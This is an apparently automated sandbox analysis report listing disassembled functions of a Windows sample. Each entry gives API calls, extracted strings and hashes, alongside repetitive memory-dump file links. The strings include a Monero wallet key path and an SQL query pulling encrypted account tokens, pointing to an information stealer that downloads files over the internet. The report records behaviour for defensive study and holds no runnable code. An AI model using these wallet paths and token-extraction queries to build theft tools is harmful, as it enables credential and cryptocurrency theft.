Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Strings

:, xrefs: 0099755C
C, xrefs: 0099754C
\, xrefs: 00997560

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 3d1538ea24f7d6ec61621b92a4aa830d415f319463e3cd36dd37ef27eb429eb7
Instruction ID: 6432d9f9baec06f019c56ee83ed1d9d310da559747fa27f11fc45cb68479dcad
Opcode Fuzzy Hash: 3d1538ea24f7d6ec61621b92a4aa830d415f319463e3cd36dd37ef27eb429eb7
Instruction Fuzzy Hash: 9D4193B1D14248ABDF10DF98DC45FEEBBB8EF48704F100199F509A7280DB786A44CBA6

Function 009860A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00984839
Part of subcall function 009847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00984849

InternetOpenA.WININET(009A0DF7,00000001,00000000,00000000,00000000), ref: 0098610F
StrCmpCA.SHLWAPI(?,0157E538), ref: 00986147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0098618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009861B3
InternetReadFile.WININET(?,?,00000400,?), ref: 009861DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0098620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00986249
InternetCloseHandle.WININET(?), ref: 00986253
InternetCloseHandle.WININET(00000000), ref: 00986260

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 3fbf0a4b112d53fbf9bbcb7e9314b77d41a242a5a4319f8a28baa584037ed1b3
Instruction ID: 5a060ca4ab65c567c00b3cf53a5c8083d439674fb6c7afc9642bc0c88492a054
Opcode Fuzzy Hash: 3fbf0a4b112d53fbf9bbcb7e9314b77d41a242a5a4319f8a28baa584037ed1b3
Instruction Fuzzy Hash: 68514EB1900218ABDF20EF60DC49FEE77B8FB44705F108499A605AB2C1DB756E85CF95

Function 0098BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

lstrlen.KERNEL32(00000000), ref: 0098BC9F

Part of subcall function 00998E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00998E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0098BCCD
lstrlen.KERNEL32(00000000), ref: 0098BDA5
lstrlen.KERNEL32(00000000), ref: 0098BDB9

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0098BBEB
AccountId, xrefs: 0098BCC4
AccountTokens, xrefs: 0098BB49
AccountTokens, xrefs: 0098BABA

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: dbb9d3b91fc52e611b55d9aacd1aeffbcfb219320b3e3ebcdb3c538304ecd19c
Instruction ID: 5398cb751d318f7dfb16f7783f2e41be3bebd76f32f61c181fb5076dc2ecab9a
Opcode Fuzzy Hash: dbb9d3b91fc52e611b55d9aacd1aeffbcfb219320b3e3ebcdb3c538304ecd19c
Instruction Fuzzy Hash: 84B13C71910118ABDF04FBA4DC96FEE7339EF98304F444168F506A6191EF346A49CBE6

Function 00984FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00984FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00984FD1
InternetOpenA.WININET(009A0DDF,00000000,00000000,00000000,00000000), ref: 00984FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00985011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00985041
InternetCloseHandle.WININET(?), ref: 009850B9
InternetCloseHandle.WININET(?), ref: 009850C6

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 9b768ef0f2cac916dfcd94a94b64bd6b0e3c4e136609dd61fb9f346bc968da06
Instruction ID: df08c397c30edbdcc5383a18fafe3fbdab502db5b7c5b6e6989516d6ddc5dc32
Opcode Fuzzy Hash: 9b768ef0f2cac916dfcd94a94b64bd6b0e3c4e136609dd61fb9f346bc968da06
Instruction Fuzzy Hash: 8A31F5B4A4021CABDB20DF54DC85BDDB7B4FB48708F1081D9EA09A7281DB746EC58F99

Function 00998100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0157D978,00000000,?,009A0E2C,00000000,?,00000000), ref: 00998130
RtlAllocateHeap.NTDLL(00000000), ref: 00998137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00998158
wsprintfA.USER32 ref: 009981AC

Strings

@, xrefs: 0099814D
%d MB, xrefs: 009981A3

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: 159d61ca7b7ed6e7f22506da43dd146bc8a2e01731f300169877355a95a9d67c
Instruction ID: 19c59aeacd62f4905ed49e08257b8b7724b2537f4b9b6d71977cf477ce50a7d4
Opcode Fuzzy Hash: 159d61ca7b7ed6e7f22506da43dd146bc8a2e01731f300169877355a95a9d67c
Instruction Fuzzy Hash: A52129B1A44208ABDB10DFD8CD49FAFB7B8EB49B04F104509F605BB280DB7859018BA5

Function 009983DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00998426
wsprintfA.USER32 ref: 00998459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0099847B
RegCloseKey.ADVAPI32(00000000), ref: 0099848C
RegCloseKey.ADVAPI32(00000000), ref: 00998499

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

RegQueryValueExA.KERNEL32(00000000,0157D9F0,00000000,000F003F,?,00000400), ref: 009984EC
lstrlen.KERNEL32(?), ref: 00998501
RegQueryValueExA.KERNEL32(00000000,0157DAF8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,009A0B34), ref: 00998599
RegCloseKey.KERNEL32(00000000), ref: 00998608
RegCloseKey.ADVAPI32(00000000), ref: 0099861A

Strings

%s\%s, xrefs: 0099844D

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 82f713faeca5739d0bf3c9f1aa6ee4919b095e968dff5e37b09f917018327820
Instruction ID: 8ef65bc2259b2f1a95897bdc2ace3700d3ae61209637a000c4e03cd774d53d08
Opcode Fuzzy Hash: 82f713faeca5739d0bf3c9f1aa6ee4919b095e968dff5e37b09f917018327820
Instruction Fuzzy Hash: 8021E5B191022CABDB24DB54DC85FE9B3B8FB48704F00C599E609A7180DF71AA85CFE4

Function 00997690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009976A4
RtlAllocateHeap.NTDLL(00000000), ref: 009976AB
RegOpenKeyExA.KERNEL32(80000002,0156BDC0,00000000,00020119,00000000), ref: 009976DD
RegQueryValueExA.KERNEL32(00000000,0157D8E8,00000000,00000000,?,000000FF), ref: 009976FE
RegCloseKey.ADVAPI32(00000000), ref: 00997708

Strings

Windows 11, xrefs: 009976BD

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: e5b5aa2f00b944ebe4913270f1ba4b37961bff5a285b2767f96ee502b35dea5b
Instruction ID: f99b6ca5bfefd9f7abce9145e338e31b46a063bb896a61a72593a826856149db
Opcode Fuzzy Hash: e5b5aa2f00b944ebe4913270f1ba4b37961bff5a285b2767f96ee502b35dea5b
Instruction Fuzzy Hash: 50014BB5A04208BBEB00DBE4DC49FAAB7BCEB48709F104455FA04D7290EE7499048B52

Function 00997720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997734
RtlAllocateHeap.NTDLL(00000000), ref: 0099773B
RegOpenKeyExA.KERNEL32(80000002,0156BDC0,00000000,00020119,009976B9), ref: 0099775B
RegQueryValueExA.KERNEL32(009976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0099777A
RegCloseKey.ADVAPI32(009976B9), ref: 00997784

Strings

CurrentBuildNumber, xrefs: 00997771

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
